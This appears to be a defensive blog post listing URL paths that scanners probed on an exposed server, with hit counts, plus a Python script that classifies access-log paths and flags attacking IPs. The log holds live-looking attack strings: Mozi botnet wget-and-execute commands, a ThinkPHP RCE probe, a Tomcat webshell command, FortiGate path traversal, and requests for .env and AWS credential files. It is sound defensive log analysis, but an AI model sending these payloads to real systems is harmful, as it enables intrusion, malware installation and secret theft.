
URL patterns from potential attackers' scanners

If your cloud VPS exposes a common port (such as 80 or 8080) to the public internet, it will attract a steady stream of scanners and unknown users probing it day and night. Here I have collected and extracted the common URL patterns sent by those scanners and unknown users over a certain period of time, listed as request count followed by path.

    850 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    375 /.git/config
    374 /boaform/admin/formLogin
    352 /?XDEBUG_SESSION_START=phpstorm
    308 /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
    257 /Autodiscover/Autodiscover.xml
    251 /_ignition/execute-solution
    238 /console/
    223 /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
    217 /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
    213 /actuator/gateway/routes
    189 /owa/auth/logon.aspx
    187 /actuator/health
    177 /owa/auth/x.js
    165 /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
    165 /solr/admin/info/system?wt=json
    155 /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
    148 /config/getuser?index=0
    129 /HNAP1/
    117 /mifs/.;/services/LogService
    110 /_profiler/empty/search/results
    105 /wp-login.php
     98 /.aws/credentials
     98 /.well-known/security.txt
     97 /_profiler/phpinfo
     80 /laravel/.env
     78 /login
     77 /core/.env
     77 /info.php
     76 /GponForm/diag_Form?style/
     71 /GponForm/diag_Form?images/
     65 /app/.env
     65 /sdk
     64 /HNAP1
     63 /hudson
     63 /portal/redlion
     62 /c/version.js
     61 /stalker_portal/c/version.js
     60 /flu/403.html
     60 /streaming/clients_live.php
     60 /stream/live.php
     60 /system_api.php
     59 /.git/HEAD
     59 /manager/html
     57 /api/.env
     55 /admin/.env
     55 /config.js
     55 /phpinfo.php
     55 /public/.env
     55 ///remote/fgt_lang?lang=/../../../..//////////dev/
     54 /.env.save
     53 /config.json
     53 /ReportServer
     52 /fuN3
     49 /ab2g
     49 /phpinfo
     46 /.env.bak
     46 /local/.env
     44 /.DS_Store
     44 /sitemap
     44 /sitemap.txt
     43 /pools
     43 /scripts/WPnBr.dll
     43 /?Z72446562432Q1
     42 /CSS/Miniweb.css
     42 /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
     41 /__Additional
     41 /phpmyadmin/index.php
     41 /Portal0000.htm
     41 /Portal/Portal.mwsl
     40 /index.php
     39 /ab2h
     39 /h5/
     39 /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
     38 /docs/cplugError.html/
     38 /xmlrpc.php
     37 /pools/default/buckets
     36 /backend/.env
     36 /xmlrpc.php?rsd
     34 /blog/wp-includes/wlwmanifest.xml
     34 /cms/wp-includes/wlwmanifest.xml
     34 /site/wp-includes/wlwmanifest.xml
     34 /test/wp-includes/wlwmanifest.xml
     34 /web/wp-includes/wlwmanifest.xml
     34 /wordpress/wp-includes/wlwmanifest.xml
     34 /wp1/wp-includes/wlwmanifest.xml
     34 /wp/wp-includes/wlwmanifest.xml
     33 /cgi-bin/luci
     33 /vendor/.env
     32 /version
     31 /news/wp-includes/wlwmanifest.xml
     31 /sito/wp-includes/wlwmanifest.xml
     31 /website/wp-includes/wlwmanifest.xml
     31 /wp2/wp-includes/wlwmanifest.xml
     31 /wp-includes/wlwmanifest.xml
     30 /boaform/admin/formLogin?username=admin&psd=admin
     30 /prod/.env
     29 /ajax
     28 /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7
     28 /homes/
     28 /Public/home/js/check.js
     28 /web/.env
     27 /app/
     26 /api/notice
     26 /api/user/ismustmobile
     26 /application/.env
     26 /boaform/admin/formLogin?username=adminisp&psd=adminisp
     26 /frontend_dev.php/$
     26 /script
     26 /wap/
     25 /admin/
     25 /admin.shtml
     25 /api/link/platform
     25 /apps/.env
     25 /crm/.env
     25 /database/.env
     25 /echo.php
     25 /login.html
     25 /m/
     25 /manager/text/list
     25 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
     25 /src/.env
     24 /api/linkPF
     24 /c/
     24 /map/baidumap.xml
     24 /phpmyadmin/
     24 /server-status
     23 /conf/.env
     23 /evox/about
     23 /rb/getip.php?Z72446562432Q1
     23 /stalker_portal/server/tools/auth_simple.php
     22 /jenkins/login
     22 /solr/
     21 /docker/.env
     21 /storage/.env
     21 /telescope/requests
     21 /vendor/laravel/.env
     20 /admin.php
     20 /boaform/admin/formLogin?username=user&psd=user
     20 /config/.env
     20 /.env.prod
     20 /.git
     20 /login.action
     20 /mgmt/tm/util/bash
     20 /protected/.env
     20 /readme.txt
     20 /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
     19 /0bef
     19 /cdn-cgi/trace
     19 /ip.php?Z72446562432Q1
     19 /shop/wp-includes/wlwmanifest.xml
     19 /system/.env
     19 /test.php
     19 /wp-content/
     18 /app/config/.env
     18 /blog/.env
     18 /boaform/admin/formLogin?username=ec8&psd=ec8
     18 /cgi-bin/.env
     18 /config/aws.yml
     18 /editBlackAndWhiteList
     18 /en/.env
     18 /ghksjdghdfksanitycheckqwerjlhfgjksdghlid
     18 /index.html
     18 /tomcatwar.jsp
     18 /tomcatwar.jsp?pwd=j&cmd=id
     17 /2019/wp-includes/wlwmanifest.xml
     17 /audio/.env
     17 /base/.env
     17 /debug/default/view?panel=config
     17 /dev/.env
     17 /library/.env
     17 /metrics
     17 /new/.env
     17 /old/.env
     17 /shell.php
     17 /showLogin.cc
     17 /sites/all/libraries/mailchimp/.env
     17 /www/.env
     16 /1phpmyadmin/index.php?lang=en
     16 /2phpmyadmin/index.php?lang=en
     16 /admin/db/index.php?lang=en
     16 /admin/index.php?lang=en
     16 /administrator/admin/index.php?lang=en
     16 /administrator/db/index.php?lang=en
     16 /administrator/phpmyadmin/index.php?lang=en
     16 /administrator/phpMyAdmin/index.php?lang=en
     16 /administrator/pma/index.php?lang=en
     16 /administrator/PMA/index.php?lang=en
     16 /administrator/web/index.php?lang=en
     16 /admin/phpmyadmin/index.php?lang=en
     16 /admin/phpMyAdmin/index.php?lang=en
     16 /admin/pma/index.php?lang=en
     16 /admin/sqladmin/index.php?lang=en
     16 /admin/sysadmin/index.php?lang=en
     16 /admin/web/index.php?lang=en
     16 /cgi-bin/index2.asp
     16 /database/index.php?lang=en
     16 /dbadmin/index.php?lang=en
     16 /db/db-admin/index.php?lang=en
     16 /db/dbadmin/index.php?lang=en
     16 /db/dbweb/index.php?lang=en
     16 /db/index.php?lang=en
     16 /db/myadmin/index.php?lang=en
     16 /db/phpmyadmin3/index.php?lang=en
     16 /db/phpMyAdmin-3/index.php?lang=en
     16 /db/phpMyAdmin3/index.php?lang=en
     16 /db/phpmyadmin4/index.php?lang=en
     16 /db/phpMyAdmin-4/index.php?lang=en
     16 /db/phpmyadmin5/index.php?lang=en
     16 /db/phpMyAdmin-5/index.php?lang=en
     16 /db/phpmyadmin/index.php?lang=en
     16 /db/phpMyAdmin/index.php?lang=en
     16 /db/webadmin/index.php?lang=en
     16 /db/webdb/index.php?lang=en
     16 /db/websql/index.php?lang=en
     16 /dns-query
     16 /myadmin/index.php?lang=en
     16 /MyAdmin/index.php?lang=en
     16 /mysql-admin/index.php?lang=en
     16 /mysql/admin/index.php?lang=en
     16 /mysqladmin/index.php?lang=en
     16 /mysql/dbadmin/index.php?lang=en
     16 /mysql/db/index.php?lang=en
     16 /mysql/index.php?lang=en
     16 /mysqlmanager/index.php?lang=en
     16 /mysql/mysqlmanager/index.php?lang=en
     16 /mysql/pma/index.php?lang=en
     16 /mysql/pMA/index.php?lang=en
     16 /mysql/sqlmanager/index.php?lang=en
     16 /mysql/web/index.php?lang=en
     16 /phpmyadmin1/index.php?lang=en
     16 /phpMyAdmin1/index.php?lang=en
     16 /phpmyadmin2011/index.php?lang=en
     16 /phpmyadmin2012/index.php?lang=en
     16 /phpmyadmin2013/index.php?lang=en
     16 /phpmyadmin2014/index.php?lang=en
     16 /phpmyadmin2015/index.php?lang=en
     16 /phpmyadmin2016/index.php?lang=en
     16 /phpmyadmin2017/index.php?lang=en
     16 /phpmyadmin2018/index.php?lang=en
     16 /phpmyadmin2019/index.php?lang=en
     16 /phpmyadmin2020/index.php?lang=en
     16 /phpmyadmin2021/index.php?lang=en
     16 /phpmyadmin2022/index.php?lang=en
     16 /phpmyadmin2/index.php?lang=en
     16 /phpMyAdmin2/index.php?lang=en
     16 /phpmyadmin3/index.php?lang=en
     16 /phpMyAdmin-3/index.php?lang=en
     16 /phpMyAdmin3/index.php?lang=en
     16 /phpMyAdmin-4.9.7/index.php?lang=en
     16 /phpmyadmin4/index.php?lang=en
     16 /phpMyAdmin-4/index.php?lang=en
     16 /phpMyAdmin4/index.php?lang=en
     16 /phpMyAdmin-5.1.0/index.php?lang=en
     16 /phpMyAdmin-5.1.1/index.php?lang=en
     16 /phpMyAdmin-5.1.2/index.php?lang=en
     16 /phpMyAdmin-5.1.3/index.php?lang=en
     16 /phpMyAdmin5.1/index.php?lang=en
     16 /phpMyAdmin-5.2.0/index.php?lang=en
     16 /phpMyAdmin5.2/index.php?lang=en
     16 /phpmyadmin5/index.php?lang=en
     16 /phpMyAdmin-5/index.php?lang=en
     16 /phpMyAdmin5/index.php?lang=en
     16 /_phpmyadmin/index.php?lang=en
     16 /_phpmyadmin_/index.php?lang=en
     16 /php-my-admin/index.php?lang=en
     16 /php-myadmin/index.php?lang=en
     16 /phpmy-admin/index.php?lang=en
     16 /phpmyadmin/index.php?lang=en
     16 /phpmyadmin_/index.php?lang=en
     16 /phpmyAdmin/index.php?lang=en
     16 /phpMyadmin/index.php?lang=en
     16 /_phpMyAdmin/index.php?lang=en
     16 /phpMyAdmin/index.php?lang=en
     16 /phpMyAdmin_/index.php?lang=en
     16 /phpmy/index.php?lang=en
     16 /phppma/index.php?lang=en
     16 /pma/index.php?lang=en
     16 /PMA/index.php?lang=en
     16 /program/index.php?lang=en
     16 /query
     16 /resolve
     16 /rest/.env
     16 /room/getRoomBangFans
     16 /shopdb/index.php?lang=en
     16 /sqlmanager/index.php?lang=en
     16 /sql/myadmin/index.php?lang=en
     16 /sql/phpmanager/index.php?lang=en
     16 /sql/phpMyAdmin2/index.php?lang=en
     16 /sql/phpmyadmin3/index.php?lang=en
     16 /sql/phpmyadmin4/index.php?lang=en
     16 /sql/phpmyadmin5/index.php?lang=en
     16 /sql/php-myadmin/index.php?lang=en
     16 /sql/phpmy-admin/index.php?lang=en
     16 /sql/phpMyAdmin/index.php?lang=en
     16 /sql/sql-admin/index.php?lang=en
     16 /sql/sqladmin/index.php?lang=en
     16 /sql/sql/index.php?lang=en
     16 /sql/sqlweb/index.php?lang=en
     16 /sql/webadmin/index.php?lang=en
     16 /sql/webdb/index.php?lang=en
     16 /sql/websql/index.php?lang=en
     16 /webfig/
     16 /wp-admin/.env
     16 /wp-content/.env
     16 /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
     15 /aws.yml
     15 /ip?Z72446562432Q1
     15 /manager/js/left.js
     15 /newsite/.env
     15 /style.css
     15 /Telerik.Web.UI.WebResource.axd?type=rau
     15 /web_shell_cmd.gch
     14 /api/lottery/color
     14 /api/message/webInfo
     14 /api/uploads/apimap
     14 /Content/m_1/js/m_1_Jquery.js
     14 /css/style.css
     14 /h5
     14 /Home/GetAllGameCategory
     14 /index.htm
     14 /js/common.js
     14 /js/json.js
     14 /km.asmx/getPlatParam
     14 /login/kefuxian.mvc
     14 /Public/css/_pk10.css
     14 /public/css/style.css
     14 /Recruit/download_url
     14 /site/.env
     14 /staging/.env
     14 /static/guide/ab.css
     14 /static/wap/css/trade-history.css
     14 /static/wap/js/common.js
     14 /us/img/nyyh/chkjs.js
     14 /v2/start/config
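The count-plus-path list above is what falls out of an access log once the request paths are tallied. As an added example (not the author's own script), the following parses combined-format Apache/nginx log lines, tallies paths the same way, and groups them into the probe families visible in the list (secret-file fetches such as `.env`/`.git`, phpMyAdmin enumeration, PHP RCE probes, router/IoT exploit attempts, Exchange/OWA and WordPress probes, path traversal) so that the noisy source IPs can be identified. The log format, the signature regexes and the sample lines are assumptions and constructed data, not content from the page.

```python
import re
from collections import Counter
# Assumes Apache/nginx "combined" access-log format (an assumption; adapt LOG_RE for other formats).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})')

# Signature classes derived from the path families in the list above; first match wins.
SIGNATURES = [
    ("secret-file probe", re.compile(r'(^|/)\.(env|git|aws|DS_Store)(/|\.|$)|/aws\.yml$')),
    ("phpmyadmin enumeration", re.compile(r'phpmyadmin|/pma/|myadmin|sqladmin', re.I)),
    ("php rce attempt", re.compile(r'eval-stdin\.php|invokefunction|_ignition/execute-solution|<php>')),
    ("iot/router exploit", re.compile(r'boaform/admin|GponForm|HNAP1|setup\.cgi|/shell\?|web_shell_cmd')),
    ("exchange/owa probe", re.compile(r'^/(owa|ecp|autodiscover)/', re.I)),
    ("wordpress probe", re.compile(r'wp-(login|includes|content|admin)|xmlrpc\.php')),
    ("path traversal", re.compile(r'\.\./')),
]

def classify(path):  # first matching signature class for a request path, else "other"
    for name, rx in SIGNATURES:
        if rx.search(path):
            return name
    return "other"

def summarize(lines):  # per-path counts, per-class counts, and source IPs that hit any signature
    paths, classes, sources = Counter(), Counter(), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparseable lines instead of aborting the whole report
        rec = m.groupdict()
        paths[rec["path"]] += 1
        cls = classify(rec["path"])
        classes[cls] += 1
        if cls != "other":
            sources[rec["ip"]] += 1
    return paths, classes, sources

# Constructed sample lines using documentation-range IPs; not real traffic from the page.
LOG_SAMPLE = """\
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2023:13:55:37 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:58:01 +0000] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 153 "-" "-"
203.0.113.5 - - [10/Oct/2023:14:02:11 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 404 153 "-" "-"
203.0.113.5 - - [10/Oct/2023:14:02:12 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "-"
198.51.100.9 - - [10/Oct/2023:14:05:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
not a log line
"""

if __name__ == "__main__":  # prints the same "count path" layout as the list above, then the tallies
    paths, classes, sources = summarize(LOG_SAMPLE.splitlines())
    print("\n".join(f"{n:7d} {p}" for p, n in paths.most_common()), dict(classes), dict(sources), sep="\n")
```

Replace `LOG_SAMPLE.splitlines()` with `open("/var/log/nginx/access.log")` to run it against a real log; the `sources` counter is the list of addresses worth rate-limiting or blocking at the firewall.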

Reference: https://www.metasploit.com/get-started

Disclaimer
  1. Licensed under CC BY-NC 4.0
  2. For copyright issues, contact me#imzye.me (replace # with @)
  3. Not all of the commands and scripts have been tested in a production environment; use them at your own risk
  4. No private information is collected here